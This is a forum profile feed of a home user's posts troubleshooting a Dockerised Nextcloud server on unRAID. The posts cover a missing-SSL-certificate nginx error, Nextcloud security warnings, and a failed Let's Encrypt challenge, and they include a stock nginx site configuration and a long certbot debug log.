DuneJeeper

Members
  • Posts

    35
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

DuneJeeper's Achievements

Rookie

Rookie (2/14)

1

Reputation

  1. @saarg Please read my post above as you seem to be a great help to people. Also I will post my default file here. I am getting the errors LAN LOGIN ONLY: The "Strict-Transport-Security" HTTP header is not set to at least "15552000" seconds. For enhanced security, it is recommended to enable HSTS as described in the security tips ↗. Your web server is not properly set up to resolve "/.well-known/webfinger". Further information can be found in the documentation ↗. Your web server is not properly set up to resolve "/.well-known/nodeinfo". Further information can be found in the documentation ↗. Your web server is not properly set up to resolve "/.well-known/caldav". Further information can be found in the documentation ↗. Your web server is not properly set up to resolve "/.well-known/carddav". Further information can be found in the documentation ↗. I'm not getting them when I login via WAN. Default file as follows THANKS! ## Version 2022/08/20 - Changelog: https://github.com/linuxserver/docker-nextcloud/commits/master/root/defaults/nginx/site-confs/default.conf.sample # Set the `immutable` cache control options only for assets with a cache busting `v` argument map $arg_v $asset_immutable { "" ""; default "immutable"; } server { listen 80 default_server; listen [::]:80 default_server; listen 443 ssl http2 default_server; listen [::]:443 ssl http2 default_server; server_name _; root /config/www/nextcloud/; ssl_certificate /config/keys/cert.crt; ssl_certificate_key /config/keys/cert.key; # display real ip in nginx logs when connected through reverse proxy via docker network set_real_ip_from 172.0.0.0/8; real_ip_header X-Forwarded-For; # https://docs.nextcloud.com/server/latest/admin_manual/installation/nginx.html#nextcloud-in-the-webroot-of-nginx # set max upload size and increase upload timeout: client_max_body_size 512M; client_body_timeout 300s; fastcgi_buffers 64 4K; # Enable gzip but do not remove ETag headers gzip on; gzip_vary on; gzip_comp_level 4; gzip_min_length 256; gzip_proxied expired no-cache no-store private no_last_modified no_etag auth; gzip_types application/atom+xml application/javascript application/json application/ld+json application/manifest+json application/rss+xml application/vnd.geo+json application/vnd.ms-fontobject application/wasm application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/bmp image/svg+xml image/x-icon text/cache-manifest text/css text/plain text/vcard text/vnd.rim.location.xloc text/vtt text/x-component text/x-cross-domain-policy; # Pagespeed is not supported by Nextcloud, so if your server is built # with the `ngx_pagespeed` module, uncomment this line to disable it. #pagespeed off; # The settings allows you to optimize the HTTP2 bandwitdth. # See https://blog.cloudflare.com/delivering-http-2-upload-speed-improvements/ # for tunning hints client_body_buffer_size 512k; # HTTP response headers borrowed from Nextcloud `.htaccess` add_header Referrer-Policy "no-referrer" always; add_header X-Content-Type-Options "nosniff" always; add_header X-Download-Options "noopen" always; add_header X-Frame-Options "SAMEORIGIN" always; add_header X-Permitted-Cross-Domain-Policies "none" always; add_header X-Robots-Tag "none" always; add_header X-XSS-Protection "1; mode=block" always; # Remove X-Powered-By, which is an information leak fastcgi_hide_header X-Powered-By; # Specify how to handle directories -- specifying `/index.php$request_uri` # here as the fallback means that Nginx always exhibits the desired behaviour # when a client requests a path that corresponds to a directory that exists # on the server. In particular, if that directory contains an index.php file, # that file is correctly served; if it doesn't, then the request is passed to # the front-end controller. This consistent behaviour means that we don't need # to specify custom rules for certain paths (e.g. images and other assets, # `/updater`, `/ocm-provider`, `/ocs-provider`), and thus # `try_files $uri $uri/ /index.php$request_uri` # always provides the desired behaviour. index index.php index.html /index.php$request_uri; # Rule borrowed from `.htaccess` to handle Microsoft DAV clients location = / { if ( $http_user_agent ~ ^DavClnt ) { return 302 /remote.php/webdav/$is_args$args; } } location = /robots.txt { allow all; log_not_found off; access_log off; } # Make a regex exception for `/.well-known` so that clients can still # access it despite the existence of the regex rule # `location ~ /(\.|autotest|...)` which would otherwise handle requests # for `/.well-known`. location ^~ /.well-known { # The rules in this block are an adaptation of the rules # in `.htaccess` that concern `/.well-known`. location = /.well-known/carddav { return 301 /remote.php/dav/; } location = /.well-known/caldav { return 301 /remote.php/dav/; } location /.well-known/acme-challenge { try_files $uri $uri/ =404; } location /.well-known/pki-validation { try_files $uri $uri/ =404; } # Let Nextcloud's API for `/.well-known` URIs handle all other # requests by passing them to the front-end controller. return 301 /index.php$request_uri; } # Rules borrowed from `.htaccess` to hide certain paths from clients location ~ ^/(?:build|tests|config|lib|3rdparty|templates|data)(?:$|/) { return 404; } location ~ ^/(?:\.|autotest|occ|issue|indie|db_|console) { return 404; } # Ensure this block, which passes PHP files to the PHP process, is above the blocks # which handle static assets (as seen below). If this block is not declared first, # then Nginx will encounter an infinite rewriting loop when it prepends `/index.php` # to the URI, resulting in a HTTP 500 error response. location ~ \.php(?:$|/) { # Required for legacy support rewrite ^/(?!index|remote|public|cron|core\/ajax\/update|status|ocs\/v[12]|updater\/.+|oc[ms]-provider\/.+|.+\/richdocumentscode\/proxy) /index.php$request_uri; fastcgi_split_path_info ^(.+?\.php)(/.*)$; set $path_info $fastcgi_path_info; try_files $fastcgi_script_name =404; include /etc/nginx/fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $path_info; fastcgi_param modHeadersAvailable true; # Avoid sending the security headers twice fastcgi_param front_controller_active true; # Enable pretty urls fastcgi_pass 127.0.0.1:9000; fastcgi_intercept_errors on; fastcgi_request_buffering off; fastcgi_max_temp_file_size 0; } location ~ \.(?:css|js|svg|gif|png|jpg|ico|wasm|tflite|map)$ { try_files $uri /index.php$request_uri; add_header Cache-Control "public, max-age=15778463, $asset_immutable"; access_log off; # Optional: Don't log access to assets location ~ \.wasm$ { default_type application/wasm; } } location ~ \.woff2?$ { try_files $uri /index.php$request_uri; expires 7d; # Cache-Control policy borrowed from `.htaccess` access_log off; # Optional: Don't log access to assets } # Rule borrowed from `.htaccess` location /remote { return 301 /remote.php$request_uri; } location / { # enable for basic auth #auth_basic "Restricted"; #auth_basic_user_file /config/nginx/.htpasswd; try_files $uri $uri/ /index.php$request_uri; } # deny access to .htaccess/.htpasswd files location ~ /\.ht { deny all; } }
  2. @MartintheshredWhat did you do to sort this out? I'm in the same boat. Thanks
  3. I did a series of updates to both nextcloud via the web updater as well as updating the nextcloud docker. I notices on my overview page a series of errors and one in particular suggested I run the command occ db:convert-filecache-bigint When I ran it inside of the console NC became unreachable. I can't run the web gui or anything. Can anyone help? I run a cloud for my family and if I made their data unreachable it'll be terrible. I was days away from gifting them all hard drives in case my server had a problem. Please help! EDIT: The log shows this nginx: [emerg] no "ssl_certificate" is defined for the "listen ... ssl" directive in /config/nginx/site-confs/default.conf:9 EDIT 2 I came across a forum that a user said they added the lines ssl_certificate /config/keys/cert.crt; ssl_certificate_key /config/keys/cert.key; to the nginx/site-confs/default file and everything is fine. I can access it from LAN and WAN. 1: Is this a temporary fix? 2: What happened? 3: There must be a complete default file somewhere with the correct information. Where can I find this? I don't like that I have a self-modified file as it seems like a patch at best. EDIT 3 for kicks I deleted the default file and restarted NC and let NC rebuild it and it reverted to being inaccessible so I added the lines back in.
  4. The address in brackets didn't load a page. "This site can't be reached" "ERR_ADDRESS_UNREACHABLE" IPv6 is toggled off on my router. It's been the same for 3 years. It worked fine and Duckdns still gets me to nextcloud so something is working. I'm definitely not going to give up. No port forwarding rules have changed. I don't want IPv6. My public IP takes me to the same generic NPM Congratulations page as every time I type in my subdomains from google domains. Something is getting through. I don't know how it started. I'll continue to look for a solution. Thanks.
  5. When I type that 2a00:1450:400e:80f::2013 in my browser it just launces a google search and tells me it's an address in the Netherlands
  6. I'm sorry I purchased unRAID to host a cloud for my family and I'm not totally familiar with what you're saying. I'm not in IT. I appreciate you replying but if you could point me towards correcting this I'd appreciate it! Thanks!! I don't want to rely on duckdns alone.
  7. Here is an error log from the letsencrypt file inside of the NGINX appdata folder after deleting the google subdomain and the host in NPM and then redoing both 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:certbot version: 1.27.0 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:Location of certbot entry point: /usr/bin/certbot 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--cert-name', 'npm-15', '--agree-tos', '--authenticator', 'webroot', '--email', '[email protected]', '--preferred-challenges', 'dns,http', '--domains', 'vaultwarden.jsXXXXX.com'] 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) 2022-12-04 06:38:37,942:DEBUG:certbot._internal.log:Root logging level set at 30 2022-12-04 06:38:37,947:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None 2022-12-04 06:38:37,960:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot Description: Place files in webroot directory Interfaces: Authenticator, Plugin Entry point: webroot = certbot._internal.plugins.webroot:Authenticator Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0x146847b8dbe0> Prep: True 2022-12-04 06:38:37,961:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0x146847b8dbe0> and installer None 2022-12-04 06:38:37,962:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None 2022-12-04 06:38:38,212:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/244684430', new_authzr_uri=None, terms_of_service=None), ff47a0a8b3b4440b514c9676077dc033, Meta(creation_dt=datetime.datetime(2021, 10, 18, 21, 30, 9, tzinfo=<UTC>), creation_host='610dfc3962ef', register_to_eff=None))> 2022-12-04 06:38:38,214:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. 2022-12-04 06:38:38,219:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 2022-12-04 06:38:38,381:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 659 2022-12-04 06:38:38,383:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 659 Connection: keep-alive Cache-Control: public, max-age=0, no-cache X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "WevIWKAr5WU": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", "meta": { "caaIdentities": [ "letsencrypt.org" ], "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.3-September-21-2022.pdf", "website": "https://letsencrypt.org" }, "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" } 2022-12-04 06:38:38,385:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for vaultwarden.XXXXX.com 2022-12-04 06:38:38,397:DEBUG:certbot.crypto_util:Generating ECDSA key (2048 bits): /etc/letsencrypt/keys/0004_key-certbot.pem 2022-12-04 06:38:38,410:DEBUG:certbot.crypto_util:Creating CSR: /etc/letsencrypt/csr/0004_csr-certbot.pem 2022-12-04 06:38:38,415:DEBUG:acme.client:Requesting fresh nonce 2022-12-04 06:38:38,415:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. 2022-12-04 06:38:38,468:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 2022-12-04 06:38:38,470:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Connection: keep-alive Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Replay-Nonce: 5CA2zA_muTGdjlNqLW3tXuuce14PoKWDX_7cT8XZ6FKy514 X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 2022-12-04 06:38:38,470:DEBUG:acme.client:Storing nonce: 5CA2zA_muTGdjlNqLW3tXuuce14PoKWDX_7cT8XZ6FKy514 2022-12-04 06:38:38,471:DEBUG:acme.client:JWS payload: b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "vaultwarden.XXXXX.com"\n }\n ]\n}' 2022-12-04 06:38:38,480:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjVDQTJ6QV9tdVRHZGpsTnFMVzN0WHV1Y2UxNFBvS1dEWF83Y1Q4WFo2Rkt5NTE0IiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9uZXctb3JkZXIifQ", "signature": "AGiv5F7QRfo6PF87gLcBOjzJV0vHekURy8FxVwC9II3t6DXahB_h8N8zZzucHqqI8s28MFqaCKG0UhXl5MsYScYdf2Ecei0KQYUvBUYntL7HE840nYRKlLtYOQ2Q6D6ZzFuwWLcOmBJ47oziDfZZ_GiXrbgFoTw9GWD-jndBKh5cM1Svd2SYFIH3cQkg-YElcLmDbdHxRLzxt7M2_3nH5Eco9XtAT2-gr-pJVt7T5JnFPYDuc9vp3zesj8Oq2ylLJHHUrhnzedVZiyEf5HKWf5W8L9MduAHjKTX3SGCSAtUPPHaJ-qqLpXwY3R8jSDoP_-iZEr9A0eGqew32FLBA7Q", "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInZhdWx0d2FyZGVuLmpzYnNlcnZlci5jb20iCiAgICB9CiAgXQp9" } 2022-12-04 06:38:38,679:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 350 2022-12-04 06:38:38,681:DEBUG:acme.client:Received response: HTTP 201 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 350 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Location: https://acme-v02.api.letsencrypt.org/acme/order/244684430/150257178297 Replay-Nonce: 371Cq1DKlCrmoBqtyvsiKOklNyU3_ZfKvRRlQmn0CK72WQ8 X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "status": "pending", "expires": "2022-12-11T12:38:38Z", "identifiers": [ { "type": "dns", "value": "vaultwarden.XXXXX.com" } ], "authorizations": [ "https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757" ], "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/244684430/150257178297" } 2022-12-04 06:38:38,681:DEBUG:acme.client:Storing nonce: 371Cq1DKlCrmoBqtyvsiKOklNyU3_ZfKvRRlQmn0CK72WQ8 2022-12-04 06:38:38,682:DEBUG:acme.client:JWS payload: b'' 2022-12-04 06:38:38,688:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjM3MUNxMURLbENybW9CcXR5dnNpS09rbE55VTNfWmZLdlJSbFFtbjBDSzcyV1E4IiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9hdXRoei12My8xODM4MzE4NzY3NTcifQ", "signature": "MJg0fdiotGsLGY0OtDLLHrsgaDinsOYK37uXLhV9uoComDYu1z3VY4l84Uu75m5-CR-RB1hGrDSoX2K1yqqfHino783SMINzRfTfoxyFhLkrvG4j3vX6FZB7NfpiGv7bxbLnWDHO9XHcJ7pdwHz4Uf_HMa-KsBwlwGn8oqNoEamO1dwqfedmEFO4yNj4f-yvGyL7PjwBLeujeuG0bx6JQqfdSbq3pfnEOgkQGlvPd-PZ2nL1HHdg4DdjZIx_gxIIke0zs8gMTnjP2tizO6nBbpHMLMvipGEgCYxnPy1hTOVpK-GYHpoUzoc4bT7PEvyqhrvIsBAgCSTmYL6S-96X7Q", "payload": "" } 2022-12-04 06:38:38,764:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz-v3/183831876757 HTTP/1.1" 200 809 2022-12-04 06:38:38,765:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 809 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Replay-Nonce: 1DFA1Zkxib13g0N_a87Ib88r_FTzhGEJKWuXsp6aN6otrlY X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "identifier": { "type": "dns", "value": "vaultwarden.XXXXX.com" }, "status": "pending", "expires": "2022-12-11T12:38:38Z", "challenges": [ { "type": "http-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" }, { "type": "dns-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/auEevQ", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" }, { "type": "tls-alpn-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/5OAA5Q", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" } ] } 2022-12-04 06:38:38,766:DEBUG:acme.client:Storing nonce: 1DFA1Zkxib13g0N_a87Ib88r_FTzhGEJKWuXsp6aN6otrlY 2022-12-04 06:38:38,767:INFO:certbot._internal.auth_handler:Performing the following challenges: 2022-12-04 06:38:38,768:INFO:certbot._internal.auth_handler:http-01 challenge for vaultwarden.jsbserver.com 2022-12-04 06:38:38,769:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. 2022-12-04 06:38:38,769:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge 2022-12-04 06:38:38,774:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4 2022-12-04 06:38:38,776:DEBUG:acme.client:JWS payload: b'{}' 2022-12-04 06:38:38,781:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjFERkExWmt4aWIxM2cwTl9hODdJYjg4cl9GVHpoR0VKS1d1WHNwNmFONm90cmxZIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9jaGFsbC12My8xODM4MzE4NzY3NTcvZjBPd3BBIn0", "signature": "lIt_Tsfsj4ANGfGjTl9iCK41f0grLPz_3oC1EKbXY1oC3wgBcWmW0I2WhCHgQjxNK8obQMK6o2-RDc-1bDp41j1f_PiGVnVqf4oCEOIgv83NjDlMuXMUvhAKxi5Ek-M-rpQb5nI92Sd9j5_DMJ5SunzCsns_ln-5RRm5bPfRla6ailt023OcDA-_k7JqhdmLwZKN9mzFDlZZG99wDpoN9q8R9PyCWOtYYRl3ucM0h_8KzM8VTKt5wtVtmtdiuc7lYJAxmgAwtiT4Z4_0Evu5lfRddtrM098--VbfvbDFfafNC5VSbGdVG94KE_EXYfJnBycDJ96t26LenNMgJvDhzQ", "payload": "e30" } 2022-12-04 06:38:38,838:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall-v3/183831876757/f0OwpA HTTP/1.1" 200 187 2022-12-04 06:38:38,839:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:38 GMT Content-Type: application/json Content-Length: 187 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757>;rel="up" Location: https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA Replay-Nonce: 1DFAY52gw7ubiatPtDC8A01gOji0v4OZdZWxVoLreItsCjA X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "type": "http-01", "status": "pending", "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4" } 2022-12-04 06:38:38,840:DEBUG:acme.client:Storing nonce: 1DFAY52gw7ubiatPtDC8A01gOji0v4OZdZWxVoLreItsCjA 2022-12-04 06:38:38,841:INFO:certbot._internal.auth_handler:Waiting for verification... 2022-12-04 06:38:39,842:DEBUG:acme.client:JWS payload: b'' 2022-12-04 06:38:39,848:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz-v3/183831876757: { "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjQ0Njg0NDMwIiwgIm5vbmNlIjogIjFERkFZNTJndzd1YmlhdFB0REM4QTAxZ09qaTB2NE9aZFpXeFZvTHJlSXRzQ2pBIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9hdXRoei12My8xODM4MzE4NzY3NTcifQ", "signature": "Hm3jP0ZqcRvG2EE4dXqX54OOyvN6igKFK8pIyObuElcdijyfYbS0Tc81ekXc34JepaVZyyMukt47QYdOoFv3p4kACFdYFDuJVIJ4mh16XNVYFPub7zo9du7PHoB2hJ_y_CMhdqKbdYX5NrYyAsxxVn4_e0srN1aCOFNj59F0yOLPWJYF9w3F7sAUAPWU21agnUVdHNAMhAOe50xwxUd_W3V7HJDJDXuvQlqFqEd7nqJCXDp0GsuLndXONc3Imbv4j8_E7vAqaz0ExhScWtPSA9dpHu9Px5z7Nu0aw80coReZs9nAYvyQDTQUajlHfRzgd3XT2rL5uxXCAUid-I59_Q", "payload": "" } 2022-12-04 06:38:39,922:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz-v3/183831876757 HTTP/1.1" 200 1130 2022-12-04 06:38:39,924:DEBUG:acme.client:Received response: HTTP 200 Server: nginx Date: Sun, 04 Dec 2022 12:38:39 GMT Content-Type: application/json Content-Length: 1130 Connection: keep-alive Boulder-Requester: 244684430 Cache-Control: public, max-age=0, no-cache Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index" Replay-Nonce: 371CIPOmXjwa3h2D0ehLiA3F4Wdycs-bA9Nnz93C87hWxrI X-Frame-Options: DENY Strict-Transport-Security: max-age=604800 { "identifier": { "type": "dns", "value": "vaultwarden.XXXXX.com" }, "status": "invalid", "expires": "2022-12-11T12:38:38Z", "challenges": [ { "type": "http-01", "status": "invalid", "error": { "type": "urn:ietf:params:acme:error:unauthorized", "detail": "2a00:1450:400e:80f::2013: Invalid response from http://vaultwarden.XXXXX.com/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4: 404", "status": 403 }, "url": "https://acme-v02.api.letsencrypt.org/acme/chall-v3/183831876757/f0OwpA", "token": "5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4", "validationRecord": [ { "url": "http://vaultwarden.XXXXX.com/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4", "hostname": "vaultwarden.XXXXX.com", "port": "80", "addressesResolved": [ "142.250.72.51", "2a00:1450:400e:80f::2013" ], "addressUsed": "2a00:1450:400e:80f::2013" } ], "validated": "2022-12-04T12:38:38Z" } ] } 2022-12-04 06:38:39,924:DEBUG:acme.client:Storing nonce: 371CIPOmXjwa3h2D0ehLiA3F4Wdycs-bA9Nnz93C87hWxrI 2022-12-04 06:38:39,925:INFO:certbot._internal.auth_handler:Challenge failed for domain vaultwarden.XXXXX.com 2022-12-04 06:38:39,926:INFO:certbot._internal.auth_handler:http-01 challenge for vaultwarden.XXXXX.com 2022-12-04 06:38:39,927:DEBUG:certbot._internal.display.obj:Notifying user: Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: Domain: vaultwarden.XXXXX.com Type: unauthorized Detail: 2a00:1450:400e:80f::2013: Invalid response from http://vaultwarden.XXXXX.com/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4: 404 Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. 2022-12-04 06:38:39,928:DEBUG:certbot._internal.error_handler:Encountered exception: Traceback (most recent call last): File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 106, in handle_authorizations self._poll_authorizations(authzrs, max_retries, best_effort) File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 206, in _poll_authorizations raise errors.AuthorizationError('Some challenges have failed.') certbot.errors.AuthorizationError: Some challenges have failed. 2022-12-04 06:38:39,928:DEBUG:certbot._internal.error_handler:Calling registered functions 2022-12-04 06:38:39,929:INFO:certbot._internal.auth_handler:Cleaning up challenges 2022-12-04 06:38:39,929:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/5lz_b5iRNiFt7mWfO88xUuR7J4E7zurpem2-d2IZGH4 2022-12-04 06:38:39,931:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up 2022-12-04 06:38:39,932:DEBUG:certbot._internal.log:Exiting abnormally: Traceback (most recent call last): File "/usr/bin/certbot", line 8, in <module> sys.exit(main()) File "/usr/lib/python3.9/site-packages/certbot/main.py", line 19, in main return internal_main.main(cli_args) File "/usr/lib/python3.9/site-packages/certbot/_internal/main.py", line 1744, in main return config.func(config, plugins) File "/usr/lib/python3.9/site-packages/certbot/_internal/main.py", line 1591, in certonly lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) File "/usr/lib/python3.9/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert lineage = le_client.obtain_and_enroll_certificate(domains, certname) File "/usr/lib/python3.9/site-packages/certbot/_internal/client.py", line 513, in obtain_and_enroll_certificate cert, chain, key, _ = self.obtain_certificate(domains) File "/usr/lib/python3.9/site-packages/certbot/_internal/client.py", line 441, in obtain_certificate orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) File "/usr/lib/python3.9/site-packages/certbot/_internal/client.py", line 493, in _get_order_and_authorizations authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 106, in handle_authorizations self._poll_authorizations(authzrs, max_retries, best_effort) File "/usr/lib/python3.9/site-packages/certbot/_internal/auth_handler.py", line 206, in _poll_authorizations raise errors.AuthorizationError('Some challenges have failed.') certbot.errors.AuthorizationError: Some challenges have failed. 2022-12-04 06:38:39,935:ERROR:certbot._internal.log:Some challenges have failed.
  8. 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:certbot version: 1.27.0 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:Location of certbot entry point: /usr/bin/certbot 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--cert-name', 'npm-15', '--agree-tos', '--authenticator', 'webroot', '--email', '[email protected]', '--preferred-challenges', 'dns,http', '--domains', 'vaultwarden.jsXXXXX.com'] 2022-12-04 06:38:37,151:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) 2022-12-04 06:38:37,942:DEBUG:certbot._internal.log:Root logging level set at 30 2022-12-04 06:38:37,947:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None 2022-12-04 06:38:37,960:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot Description: Place files in webroot directory Interfaces: Authenticator, Plugin Entry point: webroot = certbot._internal.plugins.webroot:Authenticator Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0x146847b8dbe0> Prep: True 2022-12-04 06:38:37,961:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0x146847b8dbe0> and installer None 2022-12-04 06:38:37,962:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None 2022-12-04 06:38:38,212:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/244684430', 